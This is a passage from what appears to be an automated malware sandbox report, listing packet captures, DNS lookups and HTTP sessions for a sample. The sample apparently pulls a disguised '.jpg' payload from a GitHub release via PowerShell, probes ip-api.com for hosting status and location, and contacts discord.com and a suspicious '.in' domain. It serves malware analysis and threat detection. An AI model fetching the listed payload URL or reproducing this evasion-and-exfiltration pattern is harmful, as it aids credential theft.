Dec 5, 2024 19:36:42.097382069 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.097388029 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.097426891 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.100445032 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.100466967 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.100693941 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.100697994 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.100748062 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.108650923 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.230408907 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.230431080 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.230596066 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.230616093 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.230657101 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.233696938 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.233721018 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.233750105 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.233755112 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.233776093 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.233788013 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.236973047 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.236989975 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.237036943 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.237041950 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.237076998 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.279149055 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.279166937 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.279243946 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.279251099 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.279287100 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.282394886 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.282411098 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.282450914 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.282455921 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.282464027 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.282490969 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.285574913 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.285597086 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.285630941 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.285634995 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.285665989 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.285676003 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.289515972 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.289536953 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.289602995 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.289608002 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.289644003 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.292701006 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.292722940 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.292753935 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.292757988 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.292782068 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.292799950 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.301645994 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.431392908 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.431423903 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.431476116 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.431499004 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.431510925 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.431597948 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.434580088 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.434603930 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.434640884 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.434655905 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.434674978 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.434691906 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.437738895 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.437757969 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.437810898 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.437829018 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.437839985 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.440215111 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.471291065 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.471323013 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.471431971 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.471455097 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.471493959 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.474525928 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.474545002 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.474606991 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.474628925 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.474669933 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.478360891 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.478384018 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.478414059 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.478419065 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.478445053 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.478456974 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.481672049 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.481693029 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.481743097 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.481748104 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.481784105 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.482338905 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.482383013 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.482388973 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.482424974 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.482450008 CET	443	49733	185.199.109.133	192.168.2.4
Dec 5, 2024 19:36:42.482480049 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:42.495857954 CET	49733	443	192.168.2.4	185.199.109.133
Dec 5, 2024 19:36:57.016077995 CET	49746	80	192.168.2.4	208.95.112.1
Dec 5, 2024 19:36:57.136084080 CET	80	49746	208.95.112.1	192.168.2.4
Dec 5, 2024 19:36:57.136162996 CET	49746	80	192.168.2.4	208.95.112.1
Dec 5, 2024 19:36:57.136311054 CET	49746	80	192.168.2.4	208.95.112.1
Dec 5, 2024 19:36:57.255980968 CET	80	49746	208.95.112.1	192.168.2.4
Dec 5, 2024 19:36:58.243077993 CET	80	49746	208.95.112.1	192.168.2.4
Dec 5, 2024 19:36:58.243760109 CET	49746	80	192.168.2.4	208.95.112.1
Dec 5, 2024 19:36:58.364078045 CET	80	49746	208.95.112.1	192.168.2.4
Dec 5, 2024 19:36:58.364300966 CET	49746	80	192.168.2.4	208.95.112.1
Dec 5, 2024 19:37:18.760173082 CET	49760	80	192.168.2.4	208.95.112.1
Dec 5, 2024 19:37:18.880259037 CET	80	49760	208.95.112.1	192.168.2.4
Dec 5, 2024 19:37:18.881127119 CET	49760	80	192.168.2.4	208.95.112.1
Dec 5, 2024 19:37:18.881782055 CET	49760	80	192.168.2.4	208.95.112.1
Dec 5, 2024 19:37:19.001698971 CET	80	49760	208.95.112.1	192.168.2.4
Dec 5, 2024 19:37:20.054543972 CET	80	49760	208.95.112.1	192.168.2.4
Dec 5, 2024 19:37:20.108782053 CET	49760	80	192.168.2.4	208.95.112.1
Dec 5, 2024 19:37:20.693026066 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:20.693072081 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:20.695103884 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:20.738627911 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:20.738648891 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.954122066 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.954598904 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.954628944 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.955631018 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.955718994 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.957241058 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.957304001 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.957568884 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.957575083 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.957665920 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.957695961 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.957743883 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.957748890 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.957787991 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.957809925 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.957876921 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.957886934 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.957952023 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.957962036 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958007097 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958018064 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958070993 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958081961 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958164930 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958173990 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958218098 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958225965 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958241940 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958249092 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958264112 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958271980 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958277941 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958277941 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958287954 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958292007 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958297014 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958307028 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958318949 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958324909 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958331108 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958337069 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958439112 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958446026 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958462000 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958468914 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958478928 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958492041 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958499908 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958506107 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958515882 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958523035 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958529949 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958534002 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958540916 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958545923 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958559036 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958564997 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958575010 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958580017 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958611965 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958616972 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:21.958628893 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958642006 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958673000 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958697081 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958709002 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958728075 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958728075 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.958748102 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:21.959027052 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:22.003330946 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:23.475667953 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:23.475774050 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:23.475805044 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:23.475827932 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:23.475877047 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:23.475907087 CET	443	49766	162.159.138.232	192.168.2.4
Dec 5, 2024 19:37:23.475922108 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:23.475950003 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:23.476836920 CET	49766	443	192.168.2.4	162.159.138.232
Dec 5, 2024 19:37:23.814264059 CET	49760	80	192.168.2.4	208.95.112.1
Dec 5, 2024 19:37:23.934442997 CET	80	49760	208.95.112.1	192.168.2.4
Dec 5, 2024 19:37:23.934504032 CET	49760	80	192.168.2.4	208.95.112.1

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 5, 2024 19:36:15.385344982 CET	55591	53	192.168.2.4	1.1.1.1
Dec 5, 2024 19:36:15.523461103 CET	53	55591	1.1.1.1	192.168.2.4
Dec 5, 2024 19:36:18.142340899 CET	58012	53	192.168.2.4	1.1.1.1
Dec 5, 2024 19:36:18.281337023 CET	53	58012	1.1.1.1	192.168.2.4
Dec 5, 2024 19:36:53.812779903 CET	57141	53	192.168.2.4	1.1.1.1
Dec 5, 2024 19:36:54.212796926 CET	53	57141	1.1.1.1	192.168.2.4
Dec 5, 2024 19:36:56.864687920 CET	57111	53	192.168.2.4	1.1.1.1
Dec 5, 2024 19:36:57.012403011 CET	53	57111	1.1.1.1	192.168.2.4
Dec 5, 2024 19:37:18.620865107 CET	49942	53	192.168.2.4	1.1.1.1
Dec 5, 2024 19:37:18.759346962 CET	53	49942	1.1.1.1	192.168.2.4
Dec 5, 2024 19:37:20.549513102 CET	55559	53	192.168.2.4	1.1.1.1
Dec 5, 2024 19:37:20.686321974 CET	53	55559	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 5, 2024 19:36:15.385344982 CET	192.168.2.4	1.1.1.1	0xdc36	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Dec 5, 2024 19:36:18.142340899 CET	192.168.2.4	1.1.1.1	0x2ae8	Standard query (0)	objects.githubusercontent.com	A (IP address)	IN (0x0001)	false
Dec 5, 2024 19:36:53.812779903 CET	192.168.2.4	1.1.1.1	0x7ed	Standard query (0)	blank-7uov3.in	A (IP address)	IN (0x0001)	false
Dec 5, 2024 19:36:56.864687920 CET	192.168.2.4	1.1.1.1	0xbb50	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 5, 2024 19:37:18.620865107 CET	192.168.2.4	1.1.1.1	0x2282	Standard query (0)	ip-api.com	A (IP address)	IN (0x0001)	false
Dec 5, 2024 19:37:20.549513102 CET	192.168.2.4	1.1.1.1	0xc545	Standard query (0)	discord.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 5, 2024 19:36:15.523461103 CET	1.1.1.1	192.168.2.4	0xdc36	No error (0)	github.com		20.233.83.145	A (IP address)	IN (0x0001)	false
Dec 5, 2024 19:36:18.281337023 CET	1.1.1.1	192.168.2.4	0x2ae8	No error (0)	objects.githubusercontent.com		185.199.109.133	A (IP address)	IN (0x0001)	false
Dec 5, 2024 19:36:18.281337023 CET	1.1.1.1	192.168.2.4	0x2ae8	No error (0)	objects.githubusercontent.com		185.199.110.133	A (IP address)	IN (0x0001)	false
Dec 5, 2024 19:36:18.281337023 CET	1.1.1.1	192.168.2.4	0x2ae8	No error (0)	objects.githubusercontent.com		185.199.108.133	A (IP address)	IN (0x0001)	false
Dec 5, 2024 19:36:18.281337023 CET	1.1.1.1	192.168.2.4	0x2ae8	No error (0)	objects.githubusercontent.com		185.199.111.133	A (IP address)	IN (0x0001)	false
Dec 5, 2024 19:36:54.212796926 CET	1.1.1.1	192.168.2.4	0x7ed	Name error (3)	blank-7uov3.in	none	none	A (IP address)	IN (0x0001)	false
Dec 5, 2024 19:36:57.012403011 CET	1.1.1.1	192.168.2.4	0xbb50	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 5, 2024 19:37:18.759346962 CET	1.1.1.1	192.168.2.4	0x2282	No error (0)	ip-api.com		208.95.112.1	A (IP address)	IN (0x0001)	false
Dec 5, 2024 19:37:20.686321974 CET	1.1.1.1	192.168.2.4	0xc545	No error (0)	discord.com		162.159.138.232	A (IP address)	IN (0x0001)	false
Dec 5, 2024 19:37:20.686321974 CET	1.1.1.1	192.168.2.4	0xc545	No error (0)	discord.com		162.159.137.232	A (IP address)	IN (0x0001)	false
Dec 5, 2024 19:37:20.686321974 CET	1.1.1.1	192.168.2.4	0xc545	No error (0)	discord.com		162.159.128.233	A (IP address)	IN (0x0001)	false
Dec 5, 2024 19:37:20.686321974 CET	1.1.1.1	192.168.2.4	0xc545	No error (0)	discord.com		162.159.136.232	A (IP address)	IN (0x0001)	false
Dec 5, 2024 19:37:20.686321974 CET	1.1.1.1	192.168.2.4	0xc545	No error (0)	discord.com		162.159.135.232	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

github.com

objects.githubusercontent.com

discord.com

ip-api.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49746	208.95.112.1	80	280	C:\Users\user\AppData\Local\Temp\chost.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 19:36:57.136311054 CET	117	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.3
Dec 5, 2024 19:36:58.243077993 CET	175	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 18:36:57 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49760	208.95.112.1	80	280	C:\Users\user\AppData\Local\Temp\chost.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 19:37:18.881782055 CET	116	OUT	GET /json/?fields=225545 HTTP/1.1 Host: ip-api.com Accept-Encoding: identity User-Agent: python-urllib3/2.2.3
Dec 5, 2024 19:37:20.054543972 CET	381	IN	HTTP/1.1 200 OK Date: Thu, 05 Dec 2024 18:37:19 GMT Content-Type: application/json; charset=utf-8 Content-Length: 204 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 32 32 38 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 7d Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-228.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.228"}

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	20.233.83.145	443	5216	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 18:36:17 UTC	221	OUT	GET /newpro008/scan0052p/releases/download/secure_prj00/scan000373.jpg/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: github.com Connection: Keep-Alive
2024-12-05 18:36:18 UTC	961	IN	HTTP/1.1 302 Found Server: GitHub.com Date: Thu, 05 Dec 2024 18:36:17 GMT Content-Type: text/html; charset=utf-8 Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/891167481/a56faf23-5067-4d66-b5a8-66cbc7b403dc?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241205%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241205T183617Z&X-Amz-Expires=300&X-Amz-Signature=05af9abbcf2fda6397f14df92d9672e21ed149afb39203f4783b988b05380976&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dscan000373.jpg&response-content-type=application%2Foctet-stream Cache-Control: no-cache Strict-Transport-Security: max-age=31536000; includeSubdomains; preload X-Frame-Options: deny X-Content-Type-Options: nosniff X-XSS-Protection: 0 Referrer-Policy: no-referrer-when-downgrade
2024-12-05 18:36:18 UTC	3380	IN	Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 77 65 62 70 61 63 6b 2f 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e 63 6f 6d 20 63 6f 6c 6c 65 63 74 6f 72 2e 67 69 74 68 75 62 2e 63 6f Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ github.com/webpack/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.co

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	185.199.109.133	443	5216	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-05 18:36:19 UTC	647	OUT	GET /github-production-release-asset-2e65be/891167481/a56faf23-5067-4d66-b5a8-66cbc7b403dc?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20241205%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20241205T183617Z&X-Amz-Expires=300&X-Amz-Signature=05af9abbcf2fda6397f14df92d9672e21ed149afb39203f4783b988b05380976&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dscan000373.jpg&response-content-type=application%2Foctet-stream HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: objects.githubusercontent.com Connection: Keep-Alive
2024-12-05 18:36:19 UTC	846	IN	HTTP/1.1 200 OK Connection: close Content-Length: 51099 Content-Type: application/octet-stream Last-Modified: Tue, 19 Nov 2024 21:08:36 GMT ETag: "0x8DD08DE55AFE8D3" Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0 x-ms-request-id: f3b5a4a0-e01e-000d-19d0-3a2981000000 x-ms-version: 2024-08-04 x-ms-creation-time: Tue, 19 Nov 2024 21:08:36 GMT x-ms-blob-content-md5: CN8yPIXHPp05dW7SNEvAWg== x-ms-lease-status: unlocked x-ms-lease-state: available x-ms-blob-type: BlockBlob Content-Disposition: attachment; filename=scan000373.jpg x-ms-server-encrypted: true Via: 1.1 varnish, 1.1 varnish Fastly-Restarts: 1 Accept-Ranges: bytes Age: 195 Date: Thu, 05 Dec 2024 18:36:19 GMT X-Served-By: cache-iad-kiad7000036-IAD, cache-ewr-kewr1740021-EWR X-Cache: 